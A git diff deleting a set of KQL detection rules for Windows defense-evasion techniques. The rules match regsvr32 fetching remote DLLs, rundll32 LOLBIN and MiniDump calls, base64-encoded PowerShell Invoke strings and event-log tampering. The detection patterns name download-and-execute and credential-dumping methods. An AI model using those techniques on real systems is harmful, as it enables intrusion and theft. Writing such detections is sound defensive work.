-| where (ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Roaming\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\") and (FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework64\\") and FolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_CMD_Shell_Output_Redirect.kql b/Defense Evasion/Potentially_Suspicious_CMD_Shell_Output_Redirect.kql
deleted file mode 100644
index cb8fcc62..00000000
--- a/Defense Evasion/Potentially_Suspicious_CMD_Shell_Output_Redirect.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/12
-// Level: medium
-// Description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location.
-This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and (((ProcessCommandLine contains ">" and ProcessCommandLine contains "%APPDATA%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TEMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%TMP%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "%USERPROFILE%\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\ProgramData\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Temp\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Users\\Public\\") or (ProcessCommandLine contains ">" and ProcessCommandLine contains "C:\\Windows\\Temp\\")) or ((ProcessCommandLine contains " >" or ProcessCommandLine contains "\">" or ProcessCommandLine contains "'>") and (ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Cabinet_File_Expansion.kql b/Defense Evasion/Potentially_Suspicious_Cabinet_File_Expansion.kql
deleted file mode 100644
index ca49b897..00000000
--- a/Defense Evasion/Potentially_Suspicious_Cabinet_File_Expansion.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj, X__Junior (Nextron Systems)
-// Date: 2021/07/30
-// Level: medium
-// Description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-F:" or ProcessCommandLine contains "/F:") and FolderPath endswith "\\expand.exe") and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains ":\\ProgramData" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains ":\\Windows\\Temp") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\"))) and (not((ProcessCommandLine contains "C:\\ProgramData\\Dell\\UpdateService\\Temp\\" and InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Dell\\UpdateService\\ServiceShell.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Call_To_Win32_NTEventlogFile_Class.kql b/Defense Evasion/Potentially_Suspicious_Call_To_Win32_NTEventlogFile_Class.kql
deleted file mode 100644
index 08972048..00000000
--- a/Defense Evasion/Potentially_Suspicious_Call_To_Win32_NTEventlogFile_Class.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/13
-// Level: high
-// Description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "Win32_NTEventlogFile" and (ProcessCommandLine contains ".BackupEventlog(" or ProcessCommandLine contains ".ChangeSecurityPermissions(" or ProcessCommandLine contains ".ChangeSecurityPermissionsEx(" or ProcessCommandLine contains ".ClearEventLog(" or ProcessCommandLine contains ".Delete(" or ProcessCommandLine contains ".DeleteEx(" or ProcessCommandLine contains ".Rename(" or ProcessCommandLine contains ".TakeOwnerShip(" or ProcessCommandLine contains ".TakeOwnerShipEx(")
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql
deleted file mode 100644
index 25ef6289..00000000
--- a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/12
-// Level: medium
-// Description: Detects potentially suspicious child processes of a ClickOnce deployment application
-// Tags: attack.execution, attack.defense_evasion
-DeviceProcessEvents
-| where (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Apps\\2.0\\"
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_DiskShadow.EXE.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_Of_DiskShadow.EXE.kql
deleted file mode 100644
index d3abfa67..00000000
--- a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_DiskShadow.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/15
-// Level: medium
-// Description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\diskshadow.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_Regsvr32.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_Of_Regsvr32.kql
deleted file mode 100644
index f5e4d204..00000000
--- a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_Regsvr32.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/05/05
-// Level: high
-// Description: Detects potentially suspicious child processes of "regsvr32.exe".
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (not((ProcessCommandLine contains " -u -p " and FolderPath endswith "\\werfault.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_VsCode.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_Of_VsCode.kql
deleted file mode 100644
index 4dc7fab5..00000000
--- a/Defense Evasion/Potentially_Suspicious_Child_Process_Of_VsCode.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/26
-// Level: medium
-// Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\code.exe" and (((ProcessCommandLine contains "Invoke-Expressions" or ProcessCommandLine contains "IEX" or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "ICM" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\"))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql b/Defense Evasion/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql
deleted file mode 100644
index a30d1353..00000000
--- a/Defense Evasion/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2024/05/13
-// Level: medium
-// Description: Detects potentially suspicious child processes of KeyScrambler.exe
-// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1203, attack.t1574.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_DLL_Registered_Via_Odbcconf.EXE.kql b/Defense Evasion/Potentially_Suspicious_DLL_Registered_Via_Odbcconf.EXE.kql
deleted file mode 100644
index a5a3cf74..00000000
--- a/Defense Evasion/Potentially_Suspicious_DLL_Registered_Via_Odbcconf.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/22
-// Level: high
-// Description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses.
-// Tags: attack.defense_evasion, attack.t1218.008
-DeviceProcessEvents
-| where (ProcessCommandLine contains "REGSVR " and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")) and (not(ProcessCommandLine contains ".dll"))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql b/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql
deleted file mode 100644
index 04a1ecbd..00000000
--- a/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Using_Reg.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Stephen Lincoln @slincoln-aiq (AttackIQ)
-// Date: 2023/12/21
-// Level: medium
-// Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background.
-This is a common technique used by malware to change the desktop background to a ransom note or other image.
-
-// Tags: attack.defense_evasion, attack.impact, attack.t1112, attack.t1491.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and (ProcessCommandLine contains "Control Panel\\Desktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\ActiveDesktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\System") and ((ProcessCommandLine contains "/v NoChangingWallpaper" and ProcessCommandLine contains "/d 1") or (ProcessCommandLine contains "/v Wallpaper" and ProcessCommandLine contains "/t REG_SZ") or (ProcessCommandLine contains "/v WallpaperStyle" and ProcessCommandLine contains "/d 2"))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql b/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql
deleted file mode 100644
index ea293a77..00000000
--- a/Defense Evasion/Potentially_Suspicious_Desktop_Background_Change_Via_Registry.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)
-// Date: 2023/12/21
-// Level: medium
-// Description: Detects regsitry value settings that would replace the user's desktop background.
-This is a common technique used by malware to change the desktop background to a ransom note or other image.
-
-// Tags: attack.defense_evasion, attack.impact, attack.t1112, attack.t1491.001
-DeviceRegistryEvents
-| where (RegistryKey contains "Control Panel\\Desktop" or RegistryKey contains "CurrentVersion\\Policies\\ActiveDesktop" or RegistryKey contains "CurrentVersion\\Policies\\System") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "NoChangingWallpaper") or RegistryKey endswith "\\Wallpaper" or (RegistryValueData =~ "2" and RegistryKey endswith "\\WallpaperStyle")) and (not(InitiatingProcessFolderPath endswith "\\svchost.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Event_Viewer_Child_Process.kql b/Defense Evasion/Potentially_Suspicious_Event_Viewer_Child_Process.kql
deleted file mode 100644
index 0897182f..00000000
--- a/Defense Evasion/Potentially_Suspicious_Event_Viewer_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/03/19
-// Level: high
-// Description: Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, car.2019-04-001
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\eventvwr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\WerFault.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\WerFault.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_GoogleUpdate_Child_Process.kql b/Defense Evasion/Potentially_Suspicious_GoogleUpdate_Child_Process.kql
deleted file mode 100644
index 1175f08b..00000000
--- a/Defense Evasion/Potentially_Suspicious_GoogleUpdate_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: high
-// Description: Detects potentially suspicious child processes of "GoogleUpdate.exe"
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" and (not((isnull(FolderPath) or (FolderPath contains "\\Google" or (FolderPath endswith "\\setup.exe" or FolderPath endswith "chrome_updater.exe" or FolderPath endswith "chrome_installer.exe")))))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Office_Document_Executed_From_Trusted_Location.kql b/Defense Evasion/Potentially_Suspicious_Office_Document_Executed_From_Trusted_Location.kql
deleted file mode 100644
index 1babab4d..00000000
--- a/Defense Evasion/Potentially_Suspicious_Office_Document_Executed_From_Trusted_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/21
-// Level: high
-// Description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code.
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe"))) and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\dopus.exe") and (ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Templates" or ProcessCommandLine contains "\\AppData\\Roaming\\Microsoft\\Word\\Startup\\" or ProcessCommandLine contains "\\Microsoft Office\\root\\Templates\\" or ProcessCommandLine contains "\\Microsoft Office\\Templates\\")) and (not((ProcessCommandLine endswith ".dotx" or ProcessCommandLine endswith ".xltx" or ProcessCommandLine endswith ".potx")))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Regsvr32_HTTP_IP_Pattern.kql b/Defense Evasion/Potentially_Suspicious_Regsvr32_HTTP_IP_Pattern.kql
deleted file mode 100644
index 60ec888b..00000000
--- a/Defense Evasion/Potentially_Suspicious_Regsvr32_HTTP_IP_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/11
-// Level: high
-// Description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.
-// Tags: attack.defense_evasion, attack.t1218.010
-DeviceProcessEvents
-| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (ProcessCommandLine contains " /i:http://1" or ProcessCommandLine contains " /i:http://2" or ProcessCommandLine contains " /i:http://3" or ProcessCommandLine contains " /i:http://4" or ProcessCommandLine contains " /i:http://5" or ProcessCommandLine contains " /i:http://6" or ProcessCommandLine contains " /i:http://7" or ProcessCommandLine contains " /i:http://8" or ProcessCommandLine contains " /i:http://9" or ProcessCommandLine contains " /i:https://1" or ProcessCommandLine contains " /i:https://2" or ProcessCommandLine contains " /i:https://3" or ProcessCommandLine contains " /i:https://4" or ProcessCommandLine contains " /i:https://5" or ProcessCommandLine contains " /i:https://6" or ProcessCommandLine contains " /i:https://7" or ProcessCommandLine contains " /i:https://8" or ProcessCommandLine contains " /i:https://9" or ProcessCommandLine contains " -i:http://1" or ProcessCommandLine contains " -i:http://2" or ProcessCommandLine contains " -i:http://3" or ProcessCommandLine contains " -i:http://4" or ProcessCommandLine contains " -i:http://5" or ProcessCommandLine contains " -i:http://6" or ProcessCommandLine contains " -i:http://7" or ProcessCommandLine contains " -i:http://8" or ProcessCommandLine contains " -i:http://9" or ProcessCommandLine contains " -i:https://1" or ProcessCommandLine contains " -i:https://2" or ProcessCommandLine contains " -i:https://3" or ProcessCommandLine contains " -i:https://4" or ProcessCommandLine contains " -i:https://5" or ProcessCommandLine contains " -i:https://6" or ProcessCommandLine contains " -i:https://7" or ProcessCommandLine contains " -i:https://8" or ProcessCommandLine contains " -i:https://9")
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Rundll32_Activity.kql b/Defense Evasion/Potentially_Suspicious_Rundll32_Activity.kql
deleted file mode 100644
index ba699c24..00000000
--- a/Defense Evasion/Potentially_Suspicious_Rundll32_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects suspicious execution of rundll32, with specific calls to some DLLs with known LOLBIN functionalities
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "javascript:" and ProcessCommandLine contains ".RegisterXLL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "OpenURLA") or (ProcessCommandLine contains "url.dll" and ProcessCommandLine contains "FileProtocolHandler") or (ProcessCommandLine contains "zipfldr.dll" and ProcessCommandLine contains "RouteTheCall") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL") or (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "ShellExec_RunDLL") or (ProcessCommandLine contains "mshtml.dll" and ProcessCommandLine contains "PrintHTML") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "advpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "LaunchINFSection") or (ProcessCommandLine contains "ieadvpack.dll" and ProcessCommandLine contains "RegisterOCX") or (ProcessCommandLine contains "ieframe.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "shdocvw.dll" and ProcessCommandLine contains "OpenURL") or (ProcessCommandLine contains "syssetup.dll" and ProcessCommandLine contains "SetupInfObjectInstallAction") or (ProcessCommandLine contains "setupapi.dll" and ProcessCommandLine contains "InstallHinfSection") or (ProcessCommandLine contains "pcwutl.dll" and ProcessCommandLine contains "LaunchApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbApplication") or (ProcessCommandLine contains "dfshim.dll" and ProcessCommandLine contains "ShOpenVerbShortcut") or (ProcessCommandLine contains "scrobj.dll" and ProcessCommandLine contains "GenerateTypeLib" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "shimgvw.dll" and ProcessCommandLine contains "ImageView_Fullscreen" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "comsvcs.dll" and ProcessCommandLine contains "MiniDump")) and (not((((ProcessCommandLine contains "Shell32.dll" and ProcessCommandLine contains "Control_RunDLL" and ProcessCommandLine contains ".cpl") and InitiatingProcessCommandLine contains ".cpl" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe") or ProcessCommandLine contains "shell32.dll,Control_RunDLL desk.cpl,screensaver,@screensaver" or (ProcessCommandLine endswith ".cpl\"," and ProcessCommandLine startswith "\"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Windows\\System32\\" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\control.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Windows_App_Activity.kql b/Defense Evasion/Potentially_Suspicious_Windows_App_Activity.kql
deleted file mode 100644
index 7508341f..00000000
--- a/Defense Evasion/Potentially_Suspicious_Windows_App_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/12
-// Level: medium
-// Description: Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\" and ((ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Base64") or (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe")) and (not(((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_Wuauclt_Network_Connection.kql b/Defense Evasion/Potentially_Suspicious_Wuauclt_Network_Connection.kql
deleted file mode 100644
index 7b6fc83b..00000000
--- a/Defense Evasion/Potentially_Suspicious_Wuauclt_Network_Connection.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/12
-// Level: medium
-// Description: Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections.
-One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceNetworkEvents
-| where (InitiatingProcessCommandLine contains " /RunHandlerComServer" and InitiatingProcessFolderPath contains "wuauclt") and (not((InitiatingProcessCommandLine =~ "" or isnull(InitiatingProcessCommandLine) or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.79.0.0/16") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11")) or (InitiatingProcessCommandLine contains ":\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId" or InitiatingProcessCommandLine contains ":\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId") or (InitiatingProcessCommandLine contains ":\\Windows\\WinSxS\\" and InitiatingProcessCommandLine contains "\\UpdateDeploy.dll /ClassId "))))
\ No newline at end of file
diff --git a/Defense Evasion/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql b/Defense Evasion/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql
deleted file mode 100644
index e2931fc4..00000000
--- a/Defense Evasion/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/08/24
-// Level: high
-// Description: Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line
-// Tags: attack.defense_evasion, attack.t1140, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "OjpGcm9tQmFzZTY0U3RyaW5n" or ProcessCommandLine contains "o6RnJvbUJhc2U2NFN0cmluZ" or ProcessCommandLine contains "6OkZyb21CYXNlNjRTdHJpbm" or (ProcessCommandLine contains "OgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcA" or ProcessCommandLine contains "oAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnA" or ProcessCommandLine contains "6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZw")
\ No newline at end of file
diff --git a/Defense Evasion/PowerShell_Base64_Encoded_Invoke_Keyword.kql b/Defense Evasion/PowerShell_Base64_Encoded_Invoke_Keyword.kql
deleted file mode 100644
index be3160c2..00000000
--- a/Defense Evasion/PowerShell_Base64_Encoded_Invoke_Keyword.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t
-// Date: 2022/05/20
-// Level: high
-// Description: Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains " -e" and (ProcessCommandLine contains "SQBuAHYAbwBrAGUALQ" or ProcessCommandLine contains "kAbgB2AG8AawBlAC0A" or ProcessCommandLine contains "JAG4AdgBvAGsAZQAtA" or ProcessCommandLine contains "SW52b2tlL" or ProcessCommandLine contains "ludm9rZS" or ProcessCommandLine contains "JbnZva2Ut") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
